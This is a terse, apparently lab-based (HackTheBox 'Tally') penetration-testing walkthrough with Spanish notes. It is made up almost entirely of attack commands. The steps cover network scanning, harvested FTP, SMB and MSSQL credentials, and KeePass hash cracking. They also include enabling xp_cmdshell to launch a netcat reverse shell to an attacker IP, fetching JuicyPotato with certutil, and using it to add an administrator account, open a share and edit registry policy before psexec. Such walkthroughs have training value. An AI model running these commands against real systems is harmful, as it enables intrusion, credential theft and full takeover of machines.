nmap -A -p- -oA output 10.129.1.183 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210831134431.png

nmap -sC -sV -O -p- -oA tally 10.129.1.183

nmap -sU -O -p- -oA tally-udp 10.129.1.183

nikto -h 10.129.1.183:80

Pasted image 20210831134814.png

Pasted image 20210831134838.png

Pasted image 20210831134907.png

whatweb 10.129.1.183

Pasted image 20210831135351.png

crackmapexec smb 10.129.1.183

Pasted image 20210831135527.png

https://pentest-tools.com/public/sample-reports/sharepoint-scan-sample-report.pdf

Pasted image 20210831135853.png

http://10.129.1.183/sitepages/FinanceTeam.aspx

Pasted image 20210831140734.png

http://10.129.1.183/shared documents/forms/allitems.aspx

Pasted image 20210831141003.png

credenciales ftp_user:UTDRSCH53c"$6hys

Pasted image 20210831142506.png

ftp 10.129.1.183

con las credenciales de arriba

Pasted image 20210831142709.png

curlftpfs 'ftp_user:UTDRSCH53c"$6hys'@10.129.1.183 /mnt/ftp

cd !$

ll

Pasted image 20210831143124.png

tree .

Vemos el archivo tim.kdbx

Pasted image 20210831143507.png

Adquirimos el hash y lo ponemos en un archivo llamado hash.

keepass2john tim.kdbx

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Pasted image 20210831143912.png

Vemos el resultado 'simplementeyo'

Pasted image 20210831144020.png

Finance:Acc0unting

Pasted image 20210831144139.png

smbclient -L 10.129.1.183 -U "Finance%Acc0unting"

Pasted image 20210831144326.png

smbclient -L 10.129.1.183 -U "Finance%Acc0unting" -c "dir"

Pasted image 20210831144438.png

mkdir /mnt/smb

mount -t cifs

mount -t cifs //10.129.1.183/ACCT /mnt/smb -o username=Finance,password=Acc0unting,domain=WORKGROUP,rw

cd /mnt/smb

Pasted image 20210831144818.png

cd zz_Migration

cd Binaries

Pasted image 20210831145030.png

radare2 tester.exe

aaa

Pasted image 20210831145447.png

s main

pdf

Pasted image 20210831145606.png

credenciales GWE3V65#6KFH93@4GWTG2G

Pasted image 20210831145643.png

strings tester.exe | grep 'PWD' | tr ';' '\n' | cat

Pasted image 20210831145835.png

sqsh -S 10.129.1.183 -U 'sa'

Pasted image 20210831150056.png

sp_configure "show advanced options", 1

reconfigure

go

sp_configure "xp_cmdshell", 1

reconfigure

go

Pasted image 20210831150446.png

python3 /opt/impacket/mssqlclient.py WORKGROUP/sa@10.129.1.183

Pasted image 20210831150827.png

xp_cmdshell "\\10.10.14.125\smbFolder\nc.exe -e cmd 10.10.14.125 443"

nc -lvnp 443

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support

Pasted image 20210831151532.png

Podemos usar juicy potato

whoami /priv

Pasted image 20210831151848.png

python3 -m http.server 80

cd C:\Windows\Temp

mkdir privesc

cd privesc

certutil.exe -f -urlcache -split http://10.10.14.125/JuicyPotato.exe juicy.exe

Pasted image 20210831152500.png

juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a '/c net user cu3rv0x password123$ /add'

net user cu3rv0x

Pasted image 20210831153105.png

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net localgroup Administrators cu3rv0x /add"

Pasted image 20210831153159.png

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net share attacker_folder=C:\Windows\Temp /GRANT:Administrators,FULL"

Pasted image 20210901081708.png

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"

Pasted image 20210901081603.png

crackmapexec smb 10.129.1.183 -u 'cu3rv0x' -p 'password123$'

Pasted image 20210901081920.png

python3 /opt/impacket/examples/psexec.py WORKGROUP/cu3rv0x@10.129.1.183 cmd.exe

Pasted image 20210901082414.png

